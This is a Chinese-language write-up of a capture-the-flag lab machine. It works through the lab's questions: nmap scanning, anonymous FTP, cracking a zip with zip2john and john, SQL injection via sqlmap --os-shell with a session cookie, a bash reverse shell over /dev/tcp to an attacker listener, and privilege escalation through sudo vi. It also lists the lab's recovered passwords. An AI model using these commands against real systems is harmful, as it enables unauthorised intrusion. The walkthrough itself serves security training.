开启,看第一题:
问:除了跑了ssh和http服务,还有什么服务?
回答:ftp,使用nmap扫描,能看到结果
nmap -sV -Pn 10.129.95.174
第二个问题:
问:有一个服务时可以匿名登录的,用户名是什么?
回答:anonymous。下意识猜测是ftp服务可以匿名登录,直接在文件管理中使用ftp登录,看到以下结果,然后可以登录,确信是anonymous
并且其中包含一个backup.zip文件,直接下载下来,肯定和后面的题目相关。
说曹操曹操到,第三问
问:可以下载的文件是什么名字?
回答:backup.zip
第四问:
问:john the ripper工具中什么脚本能够用于生成hash值然后进行破解?
回答:zip2john。百度来的,john the ripper是一个用于破解各种密码的软件。在这题中需要这么处理。首先使用zip2john生成哈希值
zip2john backup.zip > hash
然后对生成的hash文件进行破解
john hash
能看到拿到的密码是741852963
第五个问题:
问:admin的密码是多少?
回答:qwerty789。通过上文获取到的backup.zip文件以及john破解的密码。直接解压后,能拿到两个文件index.php以及style.css,index.php可以看到密码的md5
直接拿出来解密,得出答案。
第六个问题:
问:sqlmap可以通过什么命令执行shell?
回答:–os-shell
在拿到shell后,我们可以进行比较多的操作了。
使用以下命令获取shell
sqlmap -u http://10.129.95.174/dashboard.php?search=1 --cookie="PHPSESSID=gtfce8ffcad3tncc5aum5ltgls" --risk=3 --level=3 --random-agent --os-shell
其中的cookie是能从前面获取的admin密码登录后获得的,必须要登录后的。
拿到shell后,反弹至本机
本机监听2233端口
nc -lnvvp 2233
远端在os-shell中执行
bash -c "bash -i >& /dev/tcp/10.10.15.15/2233 0>&1"
上图中拿到shell后能在飘目录下面拿到user的flag
接着,在网站根目录下面能知道用户postgres的数据库密码
(以上步骤可能会断开多次,好像是官方的bug,断开了就重新试一下)
尝试使用ssh看能不能登录这个用户,密码是P@s5w0rd!,直接登录上去。
使用sudo -l查看postgres用户能执行的高级权限命令
看到其中一个命令是
/bin/vi /etc/postgresql/11/main/pg_hba.conf
这里是使用vi编辑器提权,vi里可以直接输入命令,因为这个vi是sudo打开的,所以我们打开这个文件,写入以下内容(注意是直接输入,不是编辑模式编辑!)
:!/bin/bash
然后能发现获得了root权限
那么接下来就很简单了
拿到root的flag
回答一下没回答完的问题
问:postgres 用户可以使用 sudo 以 root 身份运行什么程序?
回答:vi
解释:这个地方为什么会就拿到了root的权限?
在vi/vim的命令模式下!加在命令后面表示强制执行,如果加在前边表示这是一条shell命令。以 !/bin/bash为例,这句命令表示以shell命令的方式执行 /bin/bash,也就是打开一个交互式终端。在vi/vim的命令中,shell表示打开一个终端。
后面两个flag提交如下
参考了以下大佬们的文章:
https://blog.youkuaiyun.com/qq_45619909/article/details/123366329
https://blog.youkuaiyun.com/rpsate/article/details/119305417
https://blog.youkuaiyun.com/m0_48066270/article/details/108696605
https://blog.youkuaiyun.com/foryouslgme/article/details/52778657
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
